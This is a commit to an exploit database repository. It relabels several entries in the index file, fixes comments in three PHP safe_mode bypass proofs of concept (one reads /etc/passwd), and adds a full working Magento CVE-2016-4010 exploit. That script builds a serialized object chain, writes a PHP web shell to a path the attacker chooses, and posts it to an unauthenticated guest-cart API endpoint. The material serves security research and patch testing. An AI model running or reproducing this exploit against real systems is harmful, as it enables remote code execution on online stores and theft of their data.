DB: 2016-05-19

1 new exploits Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl) Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Perl) Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby) Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby) Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python) Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Python) PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1) PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2) PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3) PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (1) PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (2) PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (3) phpliteadmin 1.1 - Multiple Vulnerabilities phpLiteAdmin 1.1 - Multiple Vulnerabilities PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit PHP <= 5.5.33 / <= 7.0.4 - SNMP Format String Exploit Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File
2016-05-19 05:05:38 +00:00 · 2016-05-19 05:05:38 +00:00 · feb7c15c11
commit feb7c15c11
parent 6dc4d46521
5 changed files with 562 additions and 14 deletions
--- a/files.csv
+++ b/files.csv
@ -5247,7 +5247,7 @@ id,file,description,date,author,platform,type,port
 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 - (RFIi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
-5622,platforms/linux/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
+5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0
 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (RFI/rfd/SQL/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0
@ -5257,7 +5257,7 @@ id,file,description,date,author,platform,type,port
 5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
-5632,platforms/linux/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
+5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
 5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
@ -5344,7 +5344,7 @@ id,file,description,date,author,platform,type,port
 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability",2008-06-01,KnocKout,asp,webapps,0
 5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0
 5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0
-5720,platforms/linux/remote/5720.py,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
+5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
 5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x - BlindSQL Injection Exploit",2008-06-02,His0k4,php,webapps,0
 5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0
 5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0
@ -18544,9 +18544,9 @@ id,file,description,date,author,platform,type,port
 21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service Vulnerability",2002-01-31,"Luca Papotti",unix,dos,0
 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service Vulnerability",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0
 21263,platforms/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting Vulnerability",2002-02-04,superpetz,cgi,remote,0
-21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0
+21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0
-21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0
+21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0
-21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3)",2002-02-03,anonymous,php,remote,0
+21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (3)",2002-02-03,anonymous,php,remote,0
 21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - CSRF Add Admin Exploit",2012-09-12,LiquidWorm,php,webapps,0
 21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilitie/ Reverse Root Shell Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0
 21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart Arbitrary File Deletion Vulnerability",2012-09-12,JIKO,php,webapps,0
@ -33855,7 +33855,7 @@ id,file,description,date,author,platform,type,port
 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN launchAgent.do return-To Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
 37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN fileSystem.do Multiple Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
 37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - File Upload Vulnerability",2015-07-07,"TUNISIAN CYBER",php,webapps,80
-37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
+37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
 37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
 37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900
 37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service Vulnerability",2012-07-18,t3rm!n4t0r,multiple,dos,0
@ -35851,7 +35851,7 @@ id,file,description,date,author,platform,type,port
 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x - 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080
 39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,metasploit,java,remote,8080
 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0
-39645,platforms/multiple/remote/39645.php,"PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0
+39645,platforms/multiple/remote/39645.php,"PHP <= 5.5.33 / <= 7.0.4  - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0
 39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)",2016-04-01,"evait security GmbH",php,webapps,80
 39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0
 39648,platforms/windows/dos/39648.txt,"Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0
@ -36023,3 +36023,4 @@ id,file,description,date,author,platform,type,port
 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption Vulnerability",2016-05-17,"Google Security Research",multiple,dos,0
 39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0
 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0
 39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80
--- a/platforms/php/remote/21264.php
+++ b/platforms/php/remote/21264.php
@ -1,10 +1,11 @@
 <?php
 /* 
 source: http://www.securityfocus.com/bid/4026/info
 PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled. 
 In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
-
+*/
 <?
 /*
   PHP Safe Mode Problem
--- a/platforms/php/remote/21265.php
+++ b/platforms/php/remote/21265.php
@ -1,10 +1,11 @@
 <?php
 /* 
 source: http://www.securityfocus.com/bid/4026/info
 PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.
 In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
-
+*/
 <?php
 file_get_contents('/etc/passwd');
--- a/platforms/php/remote/21266.php
+++ b/platforms/php/remote/21266.php
@ -1,10 +1,11 @@
 <?php
 /* 
 source: http://www.securityfocus.com/bid/4026/info
 PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.
 In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
-
+*/
 <?php
 function r($fp, &$buf, $len, &$err) {
      print fread($fp, $len);
--- a/platforms/php/webapps/39838.php
+++ b/platforms/php/webapps/39838.php
@ -0,0 +1,544 @@
 <?php
 // Exploit Title: [CVE-2016-4010] Magento unauthenticated arbitrary unserialize -> arbitrary write file
 // Date: 18/05/206
 // Exploit Author: agix (discovered by NETANEL RUBIN)
 // Vendor Homepage: https://magento.com
 // Version: < 2.0.6
 // CVE : CVE-2016-4010
 // to get a valid guestCartId
 // * add an item in your cart
 // * go to checkout
 // * fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts/<guestCartId>/shipping-information
 // (* in the response check the payment method it may vary from checkmo)
 //
 // If you didn\'t provide whereToWrite, it will execute phpinfo to leak path.
 class Magento_Framework_Simplexml_Config_Cache_File extends DataObject
 {
    function __construct($data){
        $this->_data = $data;
    }
 }
 class Credis_Client{
    const TYPE_STRING      = 'string';
    const TYPE_LIST        = 'list';
    const TYPE_SET         = 'set';
    const TYPE_ZSET        = 'zset';
    const TYPE_HASH        = 'hash';
    const TYPE_NONE        = 'none';
    const FREAD_BLOCK_SIZE = 8192;
    /**
     * Socket connection to the Redis server or Redis library instance
     * @var resource|Redis
     */
    protected $redis;
    protected $redisMulti;
    /**
     * Host of the Redis server
     * @var string
     */
    protected $host;
    /**
     * Port on which the Redis server is running
     * @var integer
     */
    protected $port;
    /**
     * Timeout for connecting to Redis server
     * @var float
     */
    protected $timeout;
    /**
     * Timeout for reading response from Redis server
     * @var float
     */
    protected $readTimeout;
    /**
     * Unique identifier for persistent connections
     * @var string
     */
    protected $persistent;
    /**
     * @var bool
     */
    protected $closeOnDestruct = TRUE;
    /**
     * @var bool
     */
    protected $connected = TRUE;
    /**
     * @var bool
     */
    protected $standalone;
    /**
     * @var int
     */
    protected $maxConnectRetries = 0;
    /**
     * @var int
     */
    protected $connectFailures = 0;
    /**
     * @var bool
     */
    protected $usePipeline = FALSE;
    /**
     * @var array
     */
    protected $commandNames;
    /**
     * @var string
     */
    protected $commands;
    /**
     * @var bool
     */
    protected $isMulti = FALSE;
    /**
     * @var bool
     */
    protected $isWatching = FALSE;
    /**
     * @var string
     */
    protected $authPassword;
    /**
     * @var int
     */
    protected $selectedDb = 0;
    /**
     * Aliases for backwards compatibility with phpredis
     * @var array
     */
    protected $wrapperMethods = array('delete' => 'del', 'getkeys' => 'keys', 'sremove' => 'srem');
    /**
     * @var array
     */
    protected $renamedCommands;
    /**
     * @var int
     */
    protected $requests = 0;
    public function __construct($resource) {
        $this->redis = new Magento_Sales_Model_Order_Payment_Transaction($resource);
    }
 }
 class DataObject
 {
    /**
     * Object attributes
     *
     * @var array
     */
    protected $_data = [];
    /**
     * Setter/Getter underscore transformation cache
     *
     * @var array
     */
    protected static $_underscoreCache = [];
 }
 abstract class AbstractModel2 extends DataObject
 {
    /**
     * Prefix of model events names
     *
     * @var string
     */
    protected $_eventPrefix = 'core_abstract';
    /**
     * Parameter name in event
     *
     * In observe method you can use $observer->getEvent()->getObject() in this case
     *
     * @var string
     */
    protected $_eventObject = 'object';
    /**
     * Name of object id field
     *
     * @var string
     */
    protected $_idFieldName = 'id';
    /**
     * Data changes flag (true after setData|unsetData call)
     * @var $_hasDataChange bool
     */
    protected $_hasDataChanges = false;
    /**
     * Original data that was loaded
     *
     * @var array
     */
    protected $_origData;
    /**
     * Object delete flag
     *
     * @var bool
     */
    protected $_isDeleted = false;
    /**
     * Resource model instance
     *
     * @var \Magento\Framework\Model\ResourceModel\Db\AbstractDb
     */
    protected $_resource;
    /**
     * Resource collection
     *
     * @var \Magento\Framework\Model\ResourceModel\Db\Collection\AbstractCollection
     */
    protected $_resourceCollection;
    /**
     * Name of the resource model
     *
     * @var string
     */
    protected $_resourceName;
    /**
     * Name of the resource collection model
     *
     * @var string
     */
    protected $_collectionName;
    /**
     * Model cache tag for clear cache in after save and after delete
     *
     * When you use true - all cache will be clean
     *
     * @var string|array|bool
     */
    protected $_cacheTag = false;
    /**
     * Flag which can stop data saving after before save
     * Can be used for next sequence: we check data in _beforeSave, if data are
     * not valid - we can set this flag to false value and save process will be stopped
     *
     * @var bool
     */
    protected $_dataSaveAllowed = true;
    /**
     * Flag which allow detect object state: is it new object (without id) or existing one (with id)
     *
     * @var bool
     */
    protected $_isObjectNew = null;
    /**
     * Validator for checking the model state before saving it
     *
     * @var \Zend_Validate_Interface|bool|null
     */
    protected $_validatorBeforeSave = null;
    /**
     * Application Event Dispatcher
     *
     * @var \Magento\Framework\Event\ManagerInterface
     */
    protected $_eventManager;
    /**
     * Application Cache Manager
     *
     * @var \Magento\Framework\App\CacheInterface
     */
    protected $_cacheManager;
    /**
     * @var \Magento\Framework\Registry
     */
    protected $_registry;
    /**
     * @var \Psr\Log\LoggerInterface
     */
    protected $_logger;
    /**
     * @var \Magento\Framework\App\State
     */
    protected $_appState;
    /**
     * @var \Magento\Framework\Model\ActionValidator\RemoveAction
     */
    protected $_actionValidator;
    /**
     * Array to store object's original data
     *
     * @var array
     */
    protected $storedData = [];
 }
 abstract class AbstractExtensibleModel extends AbstractModel2
 {
    protected $extensionAttributesFactory;
    /**
     * @var \Magento\Framework\Api\ExtensionAttributesInterface
     */
    protected $extensionAttributes;
    /**
     * @var AttributeValueFactory
     */
    protected $customAttributeFactory;
    /**
     * @var string[]
     */
    protected $customAttributesCodes = null;
    /**
     * @var bool
     */
    protected $customAttributesChanged = false;
 }
 abstract class AbstractModel extends AbstractExtensibleModel
 {
 }
 class Magento_Sales_Model_Order_Payment_Transaction extends AbstractModel
 {
    /**#@+
     * Supported transaction types
     * @var string
     */
    const TYPE_PAYMENT = 'payment';
    const TYPE_ORDER = 'order';
    const TYPE_AUTH = 'authorization';
    const TYPE_CAPTURE = 'capture';
    const TYPE_VOID = 'void';
    const TYPE_REFUND = 'refund';
    /**#@-*/
    /**
     * Raw details key in additional info
     */
    const RAW_DETAILS = 'raw_details_info';
    /**
     * Order instance
     *
     * @var \Magento\Sales\Model\Order\Payment
     */
    protected $_order = null;
    /**
     * Parent transaction instance
     * @var \Magento\Sales\Model\Order\Payment\Transaction
     */
    protected $_parentTransaction = null;
    /**
     * Child transactions, assoc array of transaction_id => instance
     *
     * @var array
     */
    protected $_children = null;
    /**
     * Child transactions, assoc array of txn_id => instance
     * Filled only in case when all child transactions have txn_id
     * Used for quicker search of child transactions using isset() as opposite to foreaching $_children
     *
     * @var array
     */
    protected $_identifiedChildren = null;
    /**
     * Whether to perform automatic actions on transactions, such as auto-closing and putting as a parent
     *
     * @var bool
     */
    protected $_transactionsAutoLinking = true;
    /**
     * Whether to throw exceptions on different operations
     *
     * @var bool
     */
    protected $_isFailsafe = true;
    /**
     * Whether transaction has children
     *
     * @var bool
     */
    protected $_hasChild = null;
    /**
     * Event object prefix
     *
     * @var string
     * @see \Magento\Framework\Model\AbstractModel::$_eventPrefix
     */
    protected $_eventPrefix = 'sales_order_payment_transaction';
    /**
     * Event object prefix
     *
     * @var string
     * @see \Magento\Framework\Model\AbstractModel::$_eventObject
     */
    protected $_eventObject = 'order_payment_transaction';
    /**
     * Order website id
     *
     * @var int
     */
    protected $_orderWebsiteId = null;
    /**
     * @var \Magento\Sales\Model\OrderFactory
     */
    protected $_orderFactory;
    /**
     * @var \Magento\Framework\Stdlib\DateTime\DateTimeFactory
     */
    protected $_dateFactory;
    /**
     * @var TransactionFactory
     */
    protected $_transactionFactory;
    /**
     * @var \Magento\Sales\Api\OrderPaymentRepositoryInterface
     */
    protected $orderPaymentRepository;
    /**
     * @var \Magento\Sales\Api\OrderRepositoryInterface
     */
    protected $orderRepository;
    /**
     * @param \Magento\Framework\Model\Context $context
     * @param \Magento\Framework\Registry $registry
     * @param \Magento\Framework\Api\ExtensionAttributesFactory $extensionFactory
     * @param AttributeValueFactory $customAttributeFactory
     * @param \Magento\Sales\Model\OrderFactory $orderFactory
     * @param \Magento\Framework\Stdlib\DateTime\DateTimeFactory $dateFactory
     * @param TransactionFactory $transactionFactory
     * @param \Magento\Framework\Model\ResourceModel\AbstractResource $resource
     * @param \Magento\Framework\Data\Collection\AbstractDb $resourceCollection
     * @param array $data
     * @SuppressWarnings(PHPMD.ExcessiveParameterList)
     */
    public function __construct($resource) {
        $this->_resource = $resource;
    }
 }
 class Magento_Framework_DB_Transaction{
    protected $_objects = [];
    /**
     * Transaction objects array with alias key
     *
     * @var array
     */
    protected $_objectsByAlias = [];
    /**
     * Callbacks array.
     *
     * @var array
     */
    protected $_beforeCommitCallbacks = ["phpinfo"];
 }
 if(count($argv) < 3){
    echo 'Usage: '.$argv[0].' <magento_uri> <guestCartId> (whereToWrite)'.chr(0x0a);
    echo 'To get a valid guestCartId'.chr(0x0a);
    echo '* add an item in your cart'.chr(0x0a);
    echo '* go to checkout'.chr(0x0a);
    echo '* fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts/<guestCartId>/shipping-information'.chr(0x0a);
    echo '(* in the response check the payment method it may vary from "checkmo")'.chr(0x0a).chr(0x0a);
    echo 'If you didn\'t provide whereToWrite, it will execute phpinfo to leak path.'.chr(0x0a);
    exit();
 }
 if(count($argv) === 4){
    $data = [];
    $data['is_allowed_to_save'] = True;
    $data['stat_file_name'] = $argv[3];
    $data['components'] = '<?php system($_GET[0]); ?>';
    $resource = new Magento_Framework_Simplexml_Config_Cache_File($data);
 }
 else{
    $resource = new Magento_Framework_DB_Transaction();
 }
 $redis = new Credis_Client($resource);
 $serialized = serialize($redis);
 $payload = json_decode('{"paymentMethod":{"method":"checkmo", "additional_data":{"additional_information":""}}, "email": "valid@magento.com"}');
 $payload->paymentMethod->additional_data->additional_information = str_replace('Magento_Framework_DB_Transaction', 'Magento\\Framework\\DB\\Transaction', str_replace('Magento_Sales_Model_Order_Payment_Transaction', 'Magento\\Sales\\Model\\Order\\Payment\\Transaction', str_replace('Magento_Framework_Simplexml_Config_Cache_File', 'Magento\\Framework\\Simplexml\\Config\\Cache\\File', $serialized)));
 for($i=0; $i<2; $i++){
    $c = curl_init($argv[1].'/rest/V1/guest-carts/'.$argv[2].'/set-payment-information');
    curl_setopt($c, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
    curl_setopt($c, CURLOPT_POSTFIELDS, json_encode($payload));
    curl_exec($c);
    curl_close($c);
 }
 ?>